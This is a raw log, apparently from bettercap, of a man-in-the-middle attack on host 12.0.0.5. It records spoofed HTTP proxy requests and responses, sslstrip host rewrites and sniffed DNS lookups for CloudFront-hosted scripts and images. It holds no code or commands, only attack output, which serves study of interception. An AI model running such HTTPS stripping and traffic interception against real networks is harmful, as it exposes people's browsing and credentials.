 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:57.488458262 +0200 CEST m=+24.472568384 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35364
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35354
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:57.503705597 +0200 CEST m=+24.487815663 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:57.505840624 +0200 CEST m=+24.489950691 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:57.509658706 +0200 CEST m=+24.493768838 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:57.533182424 +0200 CEST m=+24.517292542 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:57.752576951 +0200 CEST m=+24.736687066 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:57.769408803 +0200 CEST m=+24.753519041 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:57.833192898 +0200 CEST m=+24.817303031 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:57.852844707 +0200 CEST m=+24.836954822 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:57.878591442 +0200 CEST m=+24.862701563 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:57.867427621 +0200 CEST m=+24.851537767 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:57.893197024 +0200 CEST m=+24.877307323 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35364
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2t77mnxyo7adj.cloudfront.net.gmv.es is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2k1ftgv7pobq7.cloudfront.net.gmv.es is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2k1ftgv7pobq7.cloudfront.net is 54.192.62.238
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2k1ftgv7pobq7.cloudfront.net is 36c0:3eee::
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2t77mnxyo7adj.cloudfront.net is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2k1ftgv7pobq7.cloudfront.net is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2k1ftgv7pobq7.cloudfront.net is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 12.0.0.5 > 8.8.8.8 : wwww.d2k1ftgv7pobq7.cloudfront.net is 54.192.62.238
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 12.0.0.5 > 8.8.8.8 : wwww.d2k1ftgv7pobq7.cloudfront.net is 36c0:3eee::
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:57.971029432 +0200 CEST m=+24.955139572 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35356
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:57.994429454 +0200 CEST m=+24.978539571 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js
 12.0.0.0/24 > 12.0.0.4  » 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:58.038596 +0200 CEST m=+25.022706125 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:58.108844662 +0200 CEST m=+25.092954798 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35354
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35358
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35364
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:58.235104602 +0200 CEST m=+25.219214723 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:58.250746833 +0200 CEST m=+25.234856969 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:58.292255027 +0200 CEST m=+25.276365111 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:58.307729237 +0200 CEST m=+25.291839347 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:58.346765758 +0200 CEST m=+25.330875875 { GET fonts.googleapis.com /css 2221}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:58.361445785 +0200 CEST m=+25.345555910 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 216.58.221.74:80 200 OK -> 12.0.0.5 (2.2 kB text/css; charset=utf-8)
 12.0.0.0/24 > 12.0.0.4  » [08:12:58] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35356
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35364
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35358
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35354
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.44763328 +0200 CEST m=+29.431743387 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.445812551 +0200 CEST m=+29.429922669 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.45240624 +0200 CEST m=+29.436516381 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.465588047 +0200 CEST m=+29.449698172 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.dns] dns 12.0.0.5 > 8.8.8.8 : wwww.d2t77mnxyo7adj.cloudfront.net is 3454:e1aa::
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2t77mnxyo7adj.cloudfront.net is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2t77mnxyo7adj.cloudfront.net is 52.84.225.170
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.dns] dns 12.0.0.5 > 8.8.8.8 : wwww.d2t77mnxyo7adj.cloudfront.net is 52.84.225.170
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2t77mnxyo7adj.cloudfront.net is 3454:e1aa::
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2t77mnxyo7adj.cloudfront.net is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.497725884 +0200 CEST m=+29.481835953 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.521756487 +0200 CEST m=+29.505866619 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35366
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.530736626 +0200 CEST m=+29.514846749 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.550988212 +0200 CEST m=+29.535098351 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.554773042 +0200 CEST m=+29.538883174 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.573961603 +0200 CEST m=+29.558071733 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35356
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.592234249 +0200 CEST m=+29.576344376 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.564620095 +0200 CEST m=+29.548730213 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35364
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.621436231 +0200 CEST m=+29.605546352 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.632952433 +0200 CEST m=+29.617062560 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.643354949 +0200 CEST m=+29.627465072 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35362
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35354
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.660703646 +0200 CEST m=+29.644813838 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:02.672720716 +0200 CEST m=+29.656830849 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.723785691 +0200 CEST m=+29.707895783 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35360
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:02.736649164 +0200 CEST m=+29.720759287 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35366
 12.0.0.0/24 > 12.0.0.4  » [08:13:02] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35356
